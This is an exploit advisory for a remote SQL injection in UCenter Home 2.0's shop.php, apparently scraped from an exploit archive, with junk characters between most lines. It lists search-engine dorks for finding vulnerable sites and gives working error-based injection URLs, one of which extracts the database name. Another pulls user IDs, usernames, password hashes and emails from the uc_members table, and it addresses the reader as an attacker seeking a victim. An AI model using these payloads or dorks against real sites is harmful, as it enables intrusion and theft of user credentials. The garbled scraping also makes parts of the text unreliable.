) I* p, |2 u- W) S( n4 D__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
. e& g" |) z- k6 U" z
" B! h7 V9 {5 M b: @2 P5 X. k1 M0 ]- Z* P
) {6 F' X9 Z9 u. Q; R
*/ Author : KnocKout
; y6 A; f$ c6 n; M1 z/ A
0 \0 d* P! x$ t" p4 I5 h*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
& |1 Q7 O! a: G2 S) T
) h% Z& K, {- K! h) j' ?5 Z2 o*/ Contact: knockoutr@msn.com
* x) J- M, k- w% k
( C" a& r& K/ ^0 g& K" w*/ Cyber-Warrior.org/CWKnocKout 3 g& N) L9 x) h6 t9 w( x8 P* Y- q# I
3 W9 L; C# M8 j/ j, Y4 h5 c- e; v__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
3 m( x2 ~& B3 M3 l6 H9 w3 O' f2 X
; k K; m R1 P6 G* cScript : UCenter Home
8 u5 b% B9 Z+ y* x# f" [
+ {5 c) ]5 R: k2 bVersion : 2.0 6 p6 Q; J3 V" T5 h6 o' e
, u. A! l, Q- {; t$ S/ y# GScript HomePage : http://u.discuz.net/
, n; e! f4 C! n; [, ?- F g0 O" O7 P
8 c% J ?1 L9 @% t__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 7 [# ^5 w1 f0 A
6 z) {8 D5 |! [ E' I
Dork : Powered by UCenter inurl:shop.php?ac=view
" W+ P2 ?( E8 Z0 n; U* ?% B! ^* u. S' v) d L
Dork 2 : inurl:shop.php?ac=view&shopid= ! h( T. ~- p A1 i9 [8 J- E
5 [% I/ a- h7 m__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
: W. X* k0 \( k, I( d" K4 u" u) B1 g9 j; A$ v
Vuln file : Shop.php , z2 q+ i% P! C) E5 O4 Q1 P
& i, X4 S. R& r* R) N Avalue's : (?)ac=view&shopid= / f' t' e7 ?, v- x7 a' V$ j
9 E5 e; ~' ~+ d% ^& W) N4 i) SVulnerable Style : SQL Injection (MySQL Error Based) / A% n, |" H- {: F5 Z9 P
8 s) {; b+ N* SNeed Metarials : Hex Conversion , K& L+ T& v7 \% Q o! Z7 n
8 e( ^! ^3 k& s* `/ P8 o__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
/ u( j8 \+ q4 f- Z4 s
' u/ V( G% `6 @ uYour Need victim Database name.
; K! Y0 p5 j3 s7 \' K) I" b) G
; P2 A% z; x; C* ?% R1 s2 d& `for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
, V8 x9 h. m/ T) K q8 D
7 _7 a; K7 d+ M* o! u..
: v% U# @8 D, R: n# A) O1 {* h
, r& x. q9 [0 o% dDB : Okey.
/ r# S3 }, G, W$ Q
' |2 F0 }% w* y3 }" C& r! ayour edit DB `[TARGET DB NAME]`
! O3 h2 N& @. ]& J# ]9 N0 r: U
; I% c1 ^. C! hExample : 'hiwir1_ucenter' - e6 g C6 F, T+ o& f8 ^
- c4 \# p) f8 D+ c3 uEdit : Okey. ! Y2 L1 p% e/ S
$ q* W* @! P/ ]# V' P/ D
Your use Hex conversion. And edit Your SQL Injection Exploit..
# c3 ?1 }8 ~3 h, M2 d( f7 ?9 V
0 u7 H9 R6 {; b % d4 k" F k: P0 H J( j: Y/ m
' [6 c* _% t' z. q+ r3 ^( z! @& l
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
+ N* b: c% Q1 ?* v |